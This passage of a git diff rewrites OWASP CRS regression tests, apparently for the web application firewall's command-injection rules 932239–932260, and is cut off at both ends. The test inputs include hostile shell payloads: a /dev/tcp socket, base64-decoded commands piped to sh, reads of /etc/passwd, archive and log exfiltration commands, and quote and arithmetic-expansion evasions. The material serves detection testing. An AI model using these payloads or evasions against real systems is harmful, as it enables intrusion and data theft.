"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=performance" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 26 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "env --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "env --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 27 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=env --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=env --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 28 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "perf --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "perf --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 29 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=perf --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=perf --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 30 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ";`cat<<()' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=pi>()ng%20127.0.0.1" - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-16 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=pi>()ng%20127.0.0.1" + version: "HTTP/1.1" + output: + log_contains: id "932240" + - test_id: 16 desc: FP against single quote inside string stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-17 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. + version: "HTTP/1.1" + output: + no_log_contains: id "932240" + - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=kill '-'9 - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-18 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=kill '-'9 + version: "HTTP/1.1" + output: + log_contains: id "932240" + - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-19 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. + version: "HTTP/1.1" + output: + no_log_contains: id "932240" + - test_id: 19 desc: "Detect quote evasion: py''thon" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=py''thon -c "print('attack')" - version: "HTTP/1.1" - output: - log_contains: id "932240" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=py''thon -c "print('attack')" + version: "HTTP/1.1" + output: + log_contains: id "932240" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 093f360c7..ccb8dfd65 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -1,224 +1,209 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, azurit" - enabled: true - name: "932250.yaml" description: | Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs tests: - - test_title: 932250-1 + - test_id: 1 desc: Negative test for excluded command `tar` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" # FIXME: 932150 already had this false positive. Fix after rework - # - test_title: 932250-3 + # - test_id: 3 # stages: - # - stage: - # input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" - - test_title: 932250-4 + # - input: + # dest_addr: "127.0.0.1" + # method: "POST" + # port: 80 + # headers: + # User-Agent: "OWASP CRS test agent" + # Host: "localhost" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + # uri: "/post" + # version: "HTTP/1.1" + # output: + # no_log_contains: id "932250" + - test_id: 4 desc: Negative test for excluded command `c99` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=ksh -c "curl google."COM - uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" - version: HTTP/1.0 - output: - log_contains: id "932250" - - test_title: 932250-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=ksh -c "curl google."COM + uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" + version: HTTP/1.0 + output: + log_contains: id "932250" + - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 7 desc: "'ls' direct command injection" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20-l%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20-l%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20foo%20bar" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20foo%20bar" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 10 desc: "'ls' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=kills%20foo%20bar" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=kills%20foo%20bar" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 11 desc: "FP for 'sh' without word boundary" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?show_comments_cookies_opt_in=true" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?show_comments_cookies_opt_in=true" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 12 desc: "FP for 'ls' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-13 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 99184896c..600f3e6de 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -1,778 +1,732 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - enabled: true - name: "932260.yaml" description: "Tests to trigger or not trigger rule 932260" +rule_id: 932260 tests: - - test_title: 932260-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=time is of the essence' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-6 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-7 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 4 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=time is of the essence' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 6 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=python cmd" - uri: "/get?cmd=python3.10%20cmd" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=python cmd" + uri: "/get?cmd=python3.10%20cmd" + version: HTTP/1.0 + output: + log_contains: id "932260" + - test_id: 8 desc: "Unix Command Injection - printf bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" - uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" + uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" + version: HTTP/1.0 + output: + log_contains: id "932260" + - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-10 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-11 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=busybox -c "echo hi" - uri: "/get?code=busybox%20-c%20%22echo%20hi%22" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=busybox -c "echo hi" + uri: "/get?code=busybox%20-c%20%22echo%20hi%22" + version: "HTTP/1.1" + output: + log_contains: id "932260" + - test_id: 12 desc: Remote Command Execution bypass with time stages: - - stage: - 